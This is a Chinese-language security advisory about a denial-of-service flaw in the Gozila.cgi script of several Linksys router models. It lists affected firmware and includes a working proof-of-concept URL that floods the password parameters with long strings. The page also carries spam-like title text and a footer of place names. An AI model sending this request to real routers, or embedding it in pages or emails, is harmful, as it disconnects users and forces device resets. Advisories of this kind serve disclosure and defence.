国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

多種Linksys路由器Gozila.cgi遠(yuǎn)程拒絕服務(wù)漏洞
2005-08-10   


信息提供:

安全公告(或線索)提供熱線:51cto.editor@gmail.com

漏洞類別:

遠(yuǎn)程拒絕服務(wù)漏洞

攻擊類型:

遠(yuǎn)程攻擊

發(fā)布日期:

2004-06-03

更新日期:

2004-06-08

受影響系統(tǒng):

Linksys EtherFast BEFSR41 Router 1.44
Linksys EtherFast BEFSR41 Router 1.43.3
Linksys EtherFast BEFSR41 Router 1.43
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFSR41 Router 1.41
Linksys EtherFast BEFSR41 Router 1.40.2
Linksys EtherFast BEFSR41 Router 1.39
Linksys EtherFast BEFSR41 Router 1.38
Linksys EtherFast BEFSR41 Router 1.37
Linksys EtherFast BEFSR41 Router 1.36
Linksys EtherFast BEFSR41 Router 1.35
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSR11 Router 1.43.3
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSR11 Router 1.41
Linksys EtherFast BEFSR11 Router 1.40.2
Linksys EtherFast BEFSRU31 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.43.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.41
Linksys EtherFast BEFSRU31 Router 1.40.2
Linksys BEFSX41 1.45.3
Linksys BEFSX41 1.44.3
Linksys BEFSX41 1.44
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys BEFSX41 1.42.7

安全系統(tǒng):

漏洞報(bào)告人:

b0f

漏洞描述:

BUGTRAQ  ID: 10453
Linksys擁有多種網(wǎng)絡(luò)設(shè)備產(chǎn)品線。
多種Linksys路由器包含的Gozila.cgi腳本未能正確處理用戶提交的參數(shù),遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)設(shè)備進(jìn)行拒絕服務(wù)攻擊。
如果提交2條超長字符串給Gozila.cgi腳本的sysPasswd和sysPasswdConfirm參數(shù),會(huì)導(dǎo)致路由器丟棄所有當(dāng)前連接,需要使用reset按鈕來恢復(fù)出廠設(shè)置。
攻擊者可以構(gòu)建WEB頁或發(fā)送惡意HTML形式EMAIL給目標(biāo)用戶。

測試方法:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

解決方法:

目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序,我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本:
http://www.linksys.com



熱詞搜索:

上一篇:實(shí)例講解:BGP配置五大注意事項(xiàng)
下一篇:輕松9步加強(qiáng)路由器安全

分享到: 收藏
主站蜘蛛池模板: 阿尔山市| 施秉县| 泽州县| 沾化县| 水城县| 东乡族自治县| 略阳县| 乐平市| 于田县| 红桥区| 建德市| 邵武市| 浮山县| 海口市| 罗平县| 吴川市| 灌南县| 连江县| 稻城县| 江阴市| 洛阳市| 宁城县| 霍州市| 五原县| 汽车| 嫩江县| 乡城县| 贵阳市| 金平| 昌吉市| 青州市| 灵璧县| 来宾市| 犍为县| 江源县| 吴川市| 怀来县| 通州市| 红安县| 清远市| 阜平县|